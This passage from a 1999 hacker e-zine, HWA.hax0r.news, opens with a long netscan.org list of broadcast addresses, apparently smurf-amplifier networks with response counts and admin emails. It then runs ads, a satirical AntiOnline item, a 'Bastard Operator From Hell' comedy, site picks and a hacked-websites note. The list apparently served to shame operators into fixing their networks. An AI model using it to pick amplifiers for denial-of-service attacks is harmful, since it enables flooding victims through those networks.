mao@cnnic.cn, whzhang@cnnic.cn, dl@cnnic.net.cn 35 207.136.233.0 topher@madriver.com 35 206.247.11.255 rkd@rmi.net 35 216.214.168.255 noc@megsinet.net 35 216.64.150.255 hostmaster@gsti.net 35 216.84.9.0 netadmin@southernet.net 35 209.85.170.0 hostmaster@softaware.com 35 209.85.170.255 hostmaster@softaware.com 35 207.13.165.0 NOC@sprint.net 35 209.163.147.255 alan@waldenweb.com 35 209.39.59.0 netadmin@onramp.net 34 24.217.1.255 mczakaria@chartercom.com 34 152.3.144.255 rdc@netcom.duke.edu 34 192.173.9.0 gandrews@drc.com 34 193.252.125.255 postmaster@wanadoo.fr, abuse@wanadoo.fr, Sylvain.Causse@wanadoo.com 34 195.202.143.0 herbert.voegl@kabsi.at, chris@streams.at, christian.steger@indis.at 34 195.90.31.0 guardian@isb.net, nerge@isb.net 34 198.188.181.0 
nes@4c.net 34 199.119.8.255 http://103536.3617@compuserve.com 34 202.78.157.0 ken@clearview.co.nz, bobg@clearview.co.nz 34 203.155.160.0 chatree@ram1.ru.ac.th, admin@ns.ksc.co.th 34 203.95.7.255 zao@stn.sh.cn, sqian@fudan.edu.cn 34 205.152.12.255 ipadmin@bellsouth.net 34 205.169.211.0 postmaster@garfield.k12.co.us 34 205.213.132.255 frcr@ltc.tec.wi.us 34 205.216.169.0 sei@vidpbx.com 34 205.216.169.255 sei@vidpbx.com 34 209.63.149.255 cbrown@advanced-power.com 34 207.163.229.0 hostmaster@alameda-coe.k12.ca.us 34 212.48.2.0 carlo.gualandri@matrix.it, melli@matrix.it 34 208.154.15.255 ron@syrworldnet.com 34 207.149.39.255 brett@pond.net 34 208.154.15.0 ron@syrworldnet.com 34 207.214.142.0 kgibbs@porterville.k12.ca.us 34 207.100.159.0 hostmaster@icix.net 34 216.214.168.0 noc@megsinet.net 34 209.3.130.255 wkrug@atlnet.org 34 209.132.105.0 garyq@wpds.com 34 209.167.171.255 chris@tntech.com 34 209.152.182.255 domain@slip.net 34 209.144.168.0 ggillespie@currents.net 34 208.225.130.255 lbutrick@awr.com 34 209.135.222.255 mromm@kivex.com 33 24.66.63.0 internet.abuse@shaw.ca 33 152.3.144.0 rdc@netcom.duke.edu 33 198.97.78.0 postmaster@algo.net 33 199.103.248.0 dnsmaster@terra.net 33 202.102.30.0 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 33 202.102.30.255 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 33 203.127.167.0 33 203.127.167.255 33 204.130.67.255 33 204.152.57.255 allen.arthur@oak.doe.gov 33 204.186.98.255 dns-request@ptd.net 33 204.192.47.0 noc@digex.net 33 204.32.135.0 Louis_Lee@icgcomm.com 33 204.32.135.255 Louis_Lee@icgcomm.com 33 205.165.50.0 RIDDLE@twu.edu 33 205.165.50.255 RIDDLE@twu.edu 33 205.230.191.0 bob@new-york.net 33 206.0.199.0 hostinfo@psi.com 33 206.141.16.255 lak@aads.net 33 206.148.48.255 Wong@callaway.com 33 207.149.39.0 brett@pond.net 33 210.17.1.0 dengwei@access.ttn.com.tw 33 216.103.204.0 ip-admin@pbi.net 33 209.233.209.0 ip-admin@pbi.net 33 209.80.138.0 tom_plati@wellesley.mec.edu 33 207.100.159.255 hostmaster@icix.net 33 
216.103.205.255 ip-admin@pbi.net 33 209.149.4.0 ipadmin@bellsouth.net 33 207.109.43.0 dns-info@uswest.net 33 207.16.219.255 help@uunet.uu.net 33 209.201.119.0 support@iconnet.net 33 209.47.228.0 chris@tntech.com 33 216.88.175.255 scotts@blairlake.com 33 207.96.71.0 domreg@erols.com 33 208.158.116.0 nomailbox@nowhere 32 63.65.8.255 twright@cathedral.org 32 140.237.20.0 lauer@merl.com 32 140.237.20.255 lauer@merl.com 32 192.211.32.255 sawise@mindspring.com, wise@widedata.com 32 194.229.106.0 32 194.78.210.0 jfs@skynet.be 32 194.78.210.255 jfs@skynet.be 32 194.78.211.0 jfs@skynet.be 32 194.78.211.255 jfs@skynet.be 32 195.232.126.0 hostmaster@wcom.net 32 198.142.200.255 matt@mpx.com.au 32 198.6.49.0 aperry@symantec.com 32 198.6.49.255 aperry@symantec.com 32 199.186.145.0 hostmaster@attmail.com 32 199.98.170.255 hostinfo@psi.com 32 200.132.7.255 gomide@nic.br 32 203.155.175.255 chatree@ram1.ru.ac.th, admin@ns.ksc.co.th 32 204.130.67.0 32 204.130.69.0 32 204.220.140.0 hostmaster@computerpro.com 32 204.220.140.255 hostmaster@computerpro.com 32 204.220.141.0 hostmaster@computerpro.com 32 204.220.141.255 hostmaster@computerpro.com 32 204.220.142.0 nomailbox@nowhere 32 204.220.142.255 nomailbox@nowhere 32 205.211.53.255 teha@algonquinc.on.ca 32 206.17.97.0 dns@cerf.net 32 209.63.148.255 cbrown@advanced-power.com 32 207.246.134.0 edmond@flyingcroc.com 32 207.246.143.0 webmaster@redchicken.com 32 207.246.134.255 edmond@flyingcroc.com 32 207.246.143.255 webmaster@redchicken.com 32 216.101.17.255 cpuccetti@advmedicine.com 32 209.32.51.0 nomailbox@nowhere 32 207.224.249.0 dlongar@uswest.net 32 209.32.51.255 nomailbox@nowhere 32 210.208.166.255 tonyyuan@mail.my.net.tw 32 207.196.81.0 hostmaster@clark.net 32 207.17.200.0 avnet@radicalmedia.com 32 209.135.192.0 32 207.66.244.255 pat@wolfe.net 32 206.74.159.0 mckee@admin.infoave.net 32 206.74.159.255 mckee@admin.infoave.net 32 209.79.52.0 marc@service.com 32 206.215.195.0 jdecryberry@cupnb.com 32 209.47.228.255 chris@tntech.com 32 
209.7.241.0 djurewic@lth3.k12.il.us 32 208.13.18.255 nomailbox@nowhere 32 206.23.197.255 jwinters@tec.net 31 152.3.228.0 rdc@netcom.duke.edu 31 152.3.228.255 rdc@netcom.duke.edu 31 192.160.217.0 greenup@whittier.edu 31 193.188.61.0 kha@knpc.com.kw, hmb@knpc.com.kw 31 194.167.45.0 bdulmet@ens2m.fr 31 194.209.156.0 hostmaster@screenlight.ch 31 194.209.156.255 hostmaster@screenlight.ch 31 194.252.70.0 jarmo.miettinen@sonera.fi, matti.aarnio@tele.fi 31 194.68.198.255 31 199.111.79.0 jaj@virginia.edu 31 202.101.127.0 31 202.102.13.0 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 31 202.102.32.0 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 31 202.102.32.255 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 31 202.247.6.0 hostmaster@nic.ad.jp 31 203.180.182.0 hostmaster@nic.ad.jp 31 203.180.182.255 hostmaster@nic.ad.jp 31 203.182.48.0 hostmaster@nic.ad.jp 31 203.238.131.0 mgr@nownuri.net, ip@nownuri.net 31 204.32.80.255 bille@petersons.com 31 205.185.160.0 Louis_Lee@icgcomm.com 31 205.231.58.255 help@uunet.uu.net 31 205.232.18.255 denz@ria.org 31 206.163.24.255 spencer@bendnet.com 31 207.137.159.255 netops@4d.net 31 206.23.197.0 jwinters@tec.net 31 210.145.24.0 hostmaster@nic.ad.jp 31 210.17.1.255 dengwei@access.ttn.com.tw 31 216.50.134.0 technical@kivex.com 31 208.241.46.255 slokuge@2launch.com 31 208.168.246.255 kenwhit@remc8.k12.mi.us 31 209.133.94.255 noc@above.net 31 216.111.166.255 noc@qwest.net 31 206.64.4.0 jba@genx.net 31 208.196.34.255 jimj@rp-l.com 31 206.23.195.255 jwinters@tec.net 31 212.86.0.0 Teemu.Anttila@verkkotieto.com 31 208.212.74.0 espencer@globix.com 31 212.86.0.255 Teemu.Anttila@verkkotieto.com 31 208.212.74.255 espencer@globix.com 31 208.10.133.0 nomailbox@nowhere 31 216.168.160.255 talal@vipcalling.com 31 216.168.160.0 talal@vipcalling.com 31 207.215.238.255 jaykata@ltsc.org 31 216.168.161.0 talal@vipcalling.com 31 209.3.40.0 noc@iconnet.net 31 209.39.24.255 netadmin@onramp.net 31 209.10.126.0 hostmaster@globix.net 31 207.244.119.255 
nitromed@shore.net 31 208.29.189.0 nomailbox@nowhere 31 208.168.231.0 bjoyce@remc8.k12.mi.us 31 208.168.231.255 bjoyce@remc8.k12.mi.us 30 63.64.128.255 info@schwablearning.org 30 166.45.5.0 hostmaster@mci.net 30 166.45.5.255 hostmaster@mci.net 30 192.174.35.255 30 193.120.12.0 noc@esat.net 30 193.120.12.255 noc@esat.net 30 193.170.126.0 m.mauerkirchner@mail.htl-leonding.ac.at, m.mauerkirchner@mail.asn-linz.ac.at, Karoly.Erdei@risc.uni-linz.ac.at, Karoly.Erdei@risc.uni-linz.ac.at 30 193.67.180.0 joppe.van.der.reijden@veronica.nl, luuk@veronica.nl 30 194.93.134.255 mcarr@intensive.net, j.baker@intensive.net 30 195.141.0.0 robert.jones@sunrise.ch, peter.zopfi@sunrise.ch, stefan.thoma@sunrise.ch 30 195.232.126.255 hostmaster@wcom.net 30 198.112.56.255 mikem@cw.com 30 198.243.153.0 dtorbet@jonesinternet.com 30 198.25.218.0 JWELLS@gi-link.dcrb.dla.mil 30 198.76.85.0 dmcginni@ndu.edu 30 198.76.85.255 dmcginni@ndu.edu 30 199.111.105.0 jaj@virginia.edu 30 199.111.105.255 jaj@virginia.edu 30 199.182.135.0 hostmaster@maxstrat.com 30 199.183.164.0 Louis_Lee@icgcomm.com 30 199.249.19.255 paul.weber@mci.com 30 199.72.94.0 hostmaster@interpath.net 30 199.72.95.0 hostmaster@interpath.net 30 199.72.95.255 hostmaster@interpath.net 30 202.102.13.255 dmkou@publicf.bta.net.cn, pearl.m@public1.ptt.js.cn 30 202.232.119.0 hostmaster@nic.ad.jp 30 202.36.35.0 30 203.110.2.0 philip@voyager.co.nz, mat@voyager.co.nz 30 203.110.2.255 philip@voyager.co.nz, mat@voyager.co.nz 30 203.238.131.255 mgr@nownuri.net, ip@nownuri.net 30 203.98.1.0 philip@voyager.co.nz, aitken@fruean.com 30 203.98.38.0 dsharples@oibunzl2.telstra.com.au 30 204.168.184.255 bill.russell@nyu.edu 30 204.178.107.255 danny@akamai.com 30 204.178.110.0 danny@akamai.com 30 204.178.110.255 aperry@symantec.com 30 204.32.80.0 bille@petersons.com 30 205.232.18.0 denz@ria.org 30 206.23.195.0 jwinters@tec.net 30 209.49.144.255 jamie@itribe.net 30 207.86.190.255 dns@digex.net 30 206.205.105.0 noc@digex.net 30 216.168.242.0 cwei@netsol.com 
30 216.168.242.255 cwei@netsol.com 30 210.236.10.255 hostmaster@nic.ad.jp 30 209.220.50.255 hostmaster@concentric.net 30 208.167.146.255 lpowers@eastky.net 30 208.227.145.0 spell@wilmington.net 30 216.50.134.255 technical@kivex.com 30 208.227.144.255 spell@wilmington.net 30 206.6.19.0 hostinfo@psi.com 30 209.220.50.0 hostmaster@concentric.net 30 209.140.163.0 darin@good.net 30 209.140.163.255 darin@good.net 30 207.245.26.255 NOCToronto@metronet.ca 30 208.217.4.0 norrg001@gold.tc.umn.edu 30 207.110.28.0 kit@connectnet.com 30 209.76.0.0 aleph1@dfw.net 30 209.76.1.0 30 209.76.2.0 aleph1@dfw.net 30 208.228.215.0 jsutherlin@pacificcolor.com 30 208.228.215.255 jsutherlin@pacificcolor.com 30 209.226.73.0 noc@in.bell.ca 30 209.226.73.255 noc@in.bell.ca 30 207.96.117.0 domreg@erols.com 30 207.96.117.255 domreg@erols.com 30 207.212.182.255 ip-admin@pbi.net 30 208.157.105.255 ipadmin@desupernet.net 30 209.79.52.255 marc@service.com 30 206.225.61.255 kenneth@jump.net 30 208.201.184.255 nomailbox@nowhere 30 208.2.250.0 nomailbox@nowhere 29 143.213.220.0 MILLARDD@shafter-emh3.army.mil 29 143.213.251.0 MILLARDD@shafter-emh3.army.mil 29 161.223.163.0 29 167.199.168.0 jda51@state.ga.us 29 168.234.39.0 mmorales@concyt.gob.gt 29 192.190.131.255 Annie.Renard@inria.fr 29 193.0.80.0 Marcin.Gromisz@fuw.edu.pl, Michal.Jankowski@fuw.edu.pl 29 193.188.81.0 29 193.188.81.255 29 193.52.99.0 tchou@narech.dnet.circe.fr, jacky.gabriel@sciences.univ-nantes.fr, jacky.gabriel@sciences.univ-nantes.fr 29 193.52.99.255 tchou@narech.dnet.circe.fr, jacky.gabriel@sciences.univ-nantes.fr, jacky.gabriel@sciences.univ-nantes.fr 29 194.151.42.255 beheer@a1.nl 29 194.205.160.0 support@insnet.net 29 194.207.107.255 andy@openworld.co.uk 29 194.79.131.255 support@internext.fr, sam@internext.fr 29 194.79.163.0 lgadot@nbo.fr 29 194.79.163.255 lgadot@nbo.fr 29 194.79.164.0 support@internext.fr, sam@internext.fr 29 194.79.164.255 support@internext.fr, sam@internext.fr 29 199.182.135.255 hostmaster@maxstrat.com 29 
199.183.165.255 Louis_Lee@icgcomm.com 29 199.72.140.255 hostmaster@interpath.net 29 200.16.176.255 nomailbox@nowhere 29 200.30.32.0 nomailbox@nowhere 29 200.30.32.255 nomailbox@nowhere 29 202.167.35.0 paul.brooks@globalone.net 29 202.167.35.255 paul.brooks@globalone.net 29 202.36.35.255 29 203.21.29.255 hostmaster@telstra.net 29 204.101.194.0 debbie@worldlinx.com 29 204.101.194.255 debbie@worldlinx.com 29 204.152.145.0 netmaster@organic.com 29 204.152.145.255 netmaster@organic.com 29 204.178.38.0 smith@icarus.usanetworks.com 29 204.178.38.255 smith@icarus.usanetworks.com 29 204.28.66.255 mi00101@mi00040.monroe.k12.la.us 29 204.71.144.0 ipadmin@cw.net 29 204.71.144.255 ipadmin@cw.net 29 205.143.124.255 rtesta@gia.org 29 205.152.39.255 ipadmin@bellsouth.net 29 205.169.153.255 ckimball@mapquest.com 29 205.174.194.0 dharringt@deq.state.va.us 29 205.205.132.0 dgiroux@cenosis.com 29 205.211.37.0 teha@algonquinc.on.ca 29 205.211.53.0 teha@algonquinc.on.ca 29 205.232.52.255 rcm@mmc.marymt.edu 29 205.243.207.0 ryan@inc.net 29 216.111.167.255 noc@qwest.net 29 206.20.225.0 noc@corp.idt.net 29 206.196.103.255 steve@inlink.com 29 208.203.140.0 asbad@camalott.com 29 209.38.216.0 dnsadmin@rmi.net 29 208.166.84.255 jgagne@monad.net 29 208.203.140.255 asbad@camalott.com 29 209.38.216.255 dnsadmin@rmi.net 29 207.22.96.0 hostmaster@clark.net 29 208.234.147.0 nomailbox@nowhere 29 208.157.126.0 rodneyl@ctlnet.com 29 207.66.209.255 pat@wolfe.net 29 208.130.144.0 nomailbox@nowhere 29 216.20.20.255 jcoco@mec.edu 29 212.208.226.0 hahn@rmcnet.fr, olemarie@fr.uu.net 29 207.215.238.0 jaykata@ltsc.org 29 207.213.16.0 nomailbox@nowhere 29 207.213.16.255 nomailbox@nowhere 29 209.187.17.0 dns@cerf.net 29 207.156.130.0 mpr@li.net 29 209.3.41.255 noc@iconnet.net 29 208.130.144.255 nomailbox@nowhere 29 208.150.32.0 noc@megsinet.net 29 208.157.105.0 ipadmin@desupernet.net 29 209.132.109.255 garyq@wpds.com 29 207.97.140.0 sbriggs@i-2000.com 29 207.97.140.255 sbriggs@i-2000.com 29 207.240.141.255 
hostmaster@inch.com 29 207.21.119.0 hostmaster@ncal.verio.net 29 209.7.241.255 djurewic@lth3.k12.il.us 29 208.215.55.0 bo@quicklink.com 29 209.0.254.0 ipadmin@level3.net 29 209.0.254.255 ipadmin@level3.net 29 209.63.26.255 bradw@tlg.com 28 167.199.169.255 jda51@state.ga.us 28 193.188.63.255 kha@knpc.com.kw, hmb@knpc.com.kw 28 193.74.176.0 mdevos@argo.be, Francois.Wouters@gemeenschapsonderwijs.be 28 194.133.98.0 loison@artinternet.fr, gaiffe@ordipat.fr 28 194.151.42.0 beheer@a1.nl 28 195.202.146.0 herbert.voegl@kabsi.at, chris@streams.at, christian.steger@indis.at 28 199.178.74.255 hostmaster@ameritech.net 28 199.98.104.0 hostinfo@psi.com 28 199.98.104.255 hostinfo@psi.com 28 200.16.177.0 nomailbox@nowhere 28 202.214.252.255 hostmaster@nic.ad.jp 28 202.219.144.0 technical@apnic.net 28 202.238.79.0 hostmaster@nic.ad.jp 28 202.238.79.255 hostmaster@nic.ad.jp 28 204.186.98.0 dns-request@ptd.net 28 204.233.237.0 tcampbell@verio.net 28 204.233.237.255 tcampbell@verio.net 28 204.242.237.255 hostinfo@psi.com 28 204.28.66.0 mi00101@mi00040.monroe.k12.la.us 28 204.97.21.255 stewartw@fpc.edu 28 204.97.74.0 nomailbox@nowhere 28 204.97.74.255 nomailbox@nowhere 28 205.139.127.255 kerrigan@syrlang.com 28 205.169.153.0 ckimball@mapquest.com 28 205.216.184.0 daniel@wolfgroup.com 28 206.112. 
dave@ntr.net 28 206.112.14.255 jchurch@ntr.net 28 206.169.28.0 hostmaster@hooked.net 28 207.132.232.255 HOSTMASTER@nic.mil 28 207.25.98.255 noc@ans.net 28 207.245.225.0 andre@storm.ca 28 207.245.225.255 andre@storm.ca 28 208.133.75.0 noc@megsinet.net 28 208.133.76.0 noc@megsinet.net 28 208.133.87.0 noc@megsinet.net 28 210.161.135.0 hostmaster@nic.ad.jp 28 207.95.245.0 Louis_Lee@icgcomm.com 28 208.133.75.255 noc@megsinet.net 28 208.133.76.255 noc@megsinet.net 28 208.133.87.255 noc@megsinet.net 28 210.161.135.255 hostmaster@nic.ad.jp 28 207.95.245.255 Louis_Lee@icgcomm.com 28 208.207.33.0 noc@bigplanet.net 28 208.166.84.0 28 207.96.63.255 domreg@erols.com 28 206.97.4.0 william.winkel@spencergifts.com 28 216.96.23.0 randy@greatplainsmfg.com 28 207.245.26.0 NOCToronto@metronet.ca 28 209.47.235.0 pamela@ebean.com 28 209.47.235.255 pamela@ebean.com 28 216.161.32.0 dns-info@uswest.net 28 216.161.32.255 dns-info@uswest.net 28 207.208.90.0 hostmaster@interaccess.com 28 207.208.93.0 hostmaster@interaccess.com 28 216.101.120.0 ip-admin@pbi.net 28 216.101.123.255 ip-admin@pbi.net 28 206.247.216.255 dnsadmin@rmi.net 28 212.208.227.255 hahn@rmcnet.fr, olemarie@fr.uu.net 28 216.20.20.0 jcoco@mec.edu 28 208.244.213.255 pforbes@opcode.com 28 209.81.187.255 noc@megsinet.net 28 209.81.189.255 noc@megsinet.net 28 209.167.146.0 itelford@scaleable.com 28 209.81.187.0 noc@megsinet.net 28 209.132.109.0 garyq@wpds.com 28 216.161.33.0 dns-info@uswest.net 28 216.161.33.255 dns-info@uswest.net 28 209.8.0.0 domreg@cais.net 28 209.70.110.255 hostmaster@clark.net 28 208.142.122.0 hostmaster@mci.net 28 210.139.3.255 hostmaster@nic.ad.jp 28 208.142.122.255 hostmaster@mci.net 27 143.43.248.0 D-Romano@wiu.edu 27 167.67.195.255 grant.jensen@emd-tech.com 27 168.234.36.0 mmorales@concyt.gob.gt 27 192.70.104.0 Annie.Renard@inria.fr 27 193.158.2.0 tgoetz@cube.net, Horn@eins-und-eins.de 27 193.188.51.255 kha@knpc.com.kw, hmb@knpc.com.kw 27 193.252.125.0 postmaster@wanadoo.fr, abuse@wanadoo.fr, 
Sylvain.Causse@wanadoo.com 27 193.54.52.255 Denis.Pays@univ-bpclermont.fr, Claude.Gendraud@univ-bpclermont.fr 27 193.74.176.255 mdevos@argo.be, Francois.Wouters@gemeenschapsonderwijs.be 27 193.74.177.0 mdevos@argo.be, Francois.Wouters@gemeenschapsonderwijs.be 27 194.133.98.255 loison@artinternet.fr, gaiffe@ordipat.fr 27 194.96.123.0 libischer@via.at 27 194.96.123.255 libischer@via.at 27 195.180.58.255 kai.bessler@windi.de, joswig@lavielle.com 27 195.246.135.255 loison@artinternet.fr, lbernard@artinternet.fr 27 195.70.147.0 pavel@terminal.cz 27 198.112.56.0 mikem@cw.com 27 198.139.127.0 pradeep@stpb.soft.net 27 198.163.232.0 tech@escape.ca 27 198.163.232.255 tech@escape.ca 27 198.163.240.0 gordt@macrodyne.net 27 198.163.240.255 gordt@macrodyne.net 27 198.163.241.0 gordt@macrodyne.net 27 198.163.241.255 gordt@macrodyne.net 27 199.172.111.0 staylor@pen.ci.santa-monica.ca.us 27 199.172.111.255 staylor@pen.ci.santa-monica.ca.us 27 199.172.97.0 staylor@pen.ci.santa-monica.ca.us 27 199.172.97.255 staylor@pen.ci.santa-monica.ca.us 27 199.176.109.0 michael_jones@chi.leoburnett.com 27 199.234.16.0 27 199.73.39.255 hostmaster@clark.net 27 199.98.103.0 hostinfo@psi.com 27 199.98.103.255 hostinfo@psi.com 27 200.38.61.0 racuna@mpsnet.com.mx 27 200.38.61.255 racuna@mpsnet.com.mx 27 202.190.19.0 27 202.219.0.255 technical@apnic.net 27 203.116.195.0 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg 27 203.116.195.255 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg 27 203.116.81.0 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg 27 203.116.95.0 chengkc@cyberway.com.sg, kennyng@cyberway.com.sg 27 203.126.200.255 hostmaster@singnet.com.sg 27 203.126.201.255 hostmaster@singnet.com.sg 27 203.127.27.0 meng@mediacity.com.sg, hostmaster@singnet.com.sg 27 203.127.27.255 meng@mediacity.com.sg, hostmaster@singnet.com.sg 27 203.179.212.0 hostmaster@nic.ad.jp 27 203.21.24.0 hostmaster@telstra.net 27 203.69.23.0 27 203.69.23.255 27 204.112.144.0 rstokes@infobahn.mb.ca 27 204.112.144.255 
scott@ties.org 21 155.36.122.255 scott@ties.org 21 155.36.123.0 scott@ties.org 21 155.36.123.255 scott@ties.org 21 155.50.21.0 bgallant@keps.com 21 155.50.21.255 bgallant@keps.com 21 160.126.250.0 DEYODEB@detrick.disa.mil 21 160.126.250.255 DEYODEB@detrick.disa.mil 21 160.126.251.255 DEYODEB@detrick.disa.mil 21 161.132.57.255 operador@rcp.net.pe 21 168.234.39.255 mmorales@concyt.gob.gt 21 192.204.141.0 21 192.204.141.255 21 192.207.6.255 tom@server1.angus.com 21 193.100.188.0 herrnfeld@kirchhoff.de 21 193.100.188.255 herrnfeld@kirchhoff.de 21 193.122.10.0 21 193.140.196.0 ozturanm@boun.edu.tr, baysalc@boun.edu.tr 21 193.140.196.255 ozturanm@boun.edu.tr, baysalc@boun.edu.tr 21 193.15.208.0 21 193.194.142.0 kocovski@gagass.de, jan.kocovski@metronet.de 21 193.194.142.255 kocovski@gagass.de, jan.kocovski@metronet.de 21 193.194.143.0 kocovski@gagass.de, jan.kocovski@metronet.de 21 193.194.143.255 kocovski@gagass.de, jan.kocovski@metronet.de 21 193.194.88.0 benhamadi@ist.cerist.dz, elmaouhab@ist.cerist.dz, cerist2@cnuce.cnr.it 21 193.52.147.0 Gerard.Lietout@univ-rouen.fr 21 193.52.147.255 Gerard.Lietout@univ-rouen.fr 21 193.52.75.0 dupre@genome.vjf.inserm.fr 21 194.100.24.0 miki@clinet.fi, Kari.Rasanen@seiska.fi 21 194.137.92.0 ari.murtonen@ktt.fi, ari.h.murtonen@posti.fi 21 194.137.92.255 ari.murtonen@ktt.fi, ari.h.murtonen@posti.fi 21 194.158.231.0 daniel.waegli@sunrise.ch, daniel.dubuis@sunrise.ch 21 194.190.192.255 andr@trustworks.com 21 194.199.97.0 Paul.Sarlat@univ-ag.fr 21 194.199.97.255 Paul.Sarlat@univ-ag.fr 21 194.250.16.0 bourgeois@fermic.fr, niel@fermic.fr 21 194.254.147.255 marteau@astrsp-mrs.fr, bazzoli@cppm.in2p3.fr, aperio@luminy.univ-mrs.fr 21 194.255.12.0 paaske@internet.dk 21 194.255.12.255 paaske@internet.dk 21 194.57.10.0 techfem@mobilia.it 21 194.57.10.255 techfem@mobilia.it 21 194.64.121.0 schreiber@otterbach.de 21 195.182.176.0 21 195.182.177.255 Use of netscan.org indicates acceptance of this disclaimer. 
© 1998-1999 netscan.org   Site version 0.98   sysop@netscan.org   Changed 12/29/98 0606 PST

@HWA

!=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
                       O 0 o O O O 0
-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-

END of main news articles content... read on for ads, humour, hacked websites etc

-=----------=- -=----------=- -=----------=- -=----------=- -=----------=-

HWA.hax0r.news

AD.S  ADVERTI$ING.        The HWA black market         ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*****************************************************************************
*                                                                           *
*  ATTRITION.ORG   http://www.attrition.org                                 *
*  ATTRITION.ORG   Advisory Archive, Hacked Page Mirror                     *
*  ATTRITION.ORG   DoS Database, Crypto Archive                             *
*  ATTRITION.ORG   Sarcasm, Rudeness, and More.                             *
*                                                                           *
*****************************************************************************

www.2600.com   www.freekevin.com   www.kevinmitnick.com

   ########################################
   # Support 2600.com and the Free Kevin  #
   # defense fund site, visit it now!     #
   #             FREE KEVIN!              #
   ########################################

One of our sponsors, visit them now: www.csoft.net

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to        //
// hwa@press.usmc.net, put AD! in the subject header please. - Ed          //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! .............

AntiOnline to Write Productive, Sense Making Article
Contributed by siko
Tuesday - July 20, 1999. 04:24PM UTC

Early this afternoon, sources close to Innerpulse Media leaked information coming from the offices of AntiOnline.

"He said he is going to write an article that doesn't piss all the fish in the pond off.", said the anonymous source. "I think he mentioned something about social engineering passwords."

Speculation has grown throughout the day as to what could be posted on AntiOnline.com that actually makes sense and doesn't piss everyone off at the same time.

"Not everything on there lacks content or doesn't make a point. I really enjoyed reading about the Granny Hacker from Heck. And that story about the new Super Computer coming out was really great the third time around on AntiOnline.com. I just wasn't in the mood two weeks ago."

AntiOnline.com
http://www.antionline.com/

@HWA

http://www.minet.net/blagues/bofh/

The Bastard System Manager From Hell #1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I get into my office and it's my first day - I want to make a good impression, so I empty my IN tray into the bin. Now that's what I call efficient!

I get a call from the big boss - he's been getting complaints about the trainee bastard operator from hell. I ask him to forward all the complaints to me and that it would be best to let me deal with them.

I ring the operator and get him to make an appointment with me. Two weeks later, he does, and I show him the complaints that have accumulated so far.

"Seventy Three complaints in your first three weeks!" I shout "It's good - but it's NOT Good Enough! You should be getting at least 10 complaints a day - AT LEAST! Now, let's see what you're doing wrong: You get a call from a user - what do you do?"

"Kill them off?" The TBOFH replies

"NO! How can you kill them off if you don't know their USERNAME? Your FIRST priority is to get their username. Then what would you do?"

"Kill them off?"

"NO! Get them to tell you what their problem is!"

"Why?"

"Because later I can say they didn't explain their problem to you properly! It's a great defence - works every time. A user rings me up to complain; I listen to their problem, then say "OH, WHEN YOU SAID `MY PC DOESN'T WORK' HE MUST HAVE THOUGHT YOU MEANT `HOW CAN I MAKE MY PC NEVER WORK AGAIN AND DESTROY MY LIFE'S WORK AT THE SAME TIME?' - IT HAPPENS ALL THE TIME!' then they tell me how implausible that is, I say how terribly sorry we are, then fake some connect and CPU time records so their monthly bill is about the same as the Uruguayan national debt...Understand? So, after you've heard their problem, what do you do?"

"Kill them off?"

"NO! Then you make up some excuse. Have you got an excuse card calendar?"

"Uh. No.."

"And you said you were qualified to operate a computer! You'd better have mine."

I pass my computer card calendar over, flipping it to page one - "ENTROPY"....... ...I like it.

"Now, you give the cretin an excuse then what do you do?"

"Kill them off?"

"YES!" (He certainly has a fixation) "Then what?"

"Hang up?"

"NO! Then they'll call you back when the problem recurs. Your job is to make them FEAR calling you. How can you work when people are calling? So, you make them pay for calling in the first place. What would you do?"

"Delete their files?"

"Yeah, it's a start, but then they may call back when they get new files. You want them NEVER to call back. What could you do?"

"Swear at them?"

"No. I can see we'll have to demonstrate. Have you got a metal ballpoint?"

"Yes"

"See that wallsocket over there. Take the refill out of the pen and poke it into the wallsocket."

"But it's live!"

"Would I really make you do it if it were live?"

"Oh"

>fiddle< >fiddle< >BZZZZZZZEEEEERT!< >THUD!<

of course I would. He was no good anyway. No killing instinct.

@HWA

SITE.1 Three sites this week

#1 http://www.seifried.org/lasg/

Linux Administrators Security Guide. Available in PDF format, a must read for all Sysadmins. Not much to say about this site, it's not flashy, it's totally utilitarian and is the place from which you should get the LASG in its updated form or redirect to mirror sites.

rated: no rating - Ed

Bored?

#2 http://www.policescanner.com/

This site will let you listen via realaudio to scanner output from various areas around the States, very interesting stuff even (or especially) for you out of towners, good for those boring weekend nights when scanner traffic is especially busy. Appeals to those that never miss an episode of COPS or are radio enthusiasts...

rated: 7/10 - eentity

Are you missing Packetstorm Security and really want to download some juarez?

#3 http://secureroot.m4d.com/hackattack/files/

try this site, they have a fairly decent archive of older philez, nice flashy site but not overly done, somewhat of a rootshell flavour....

rated: 7/10 - eentity

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

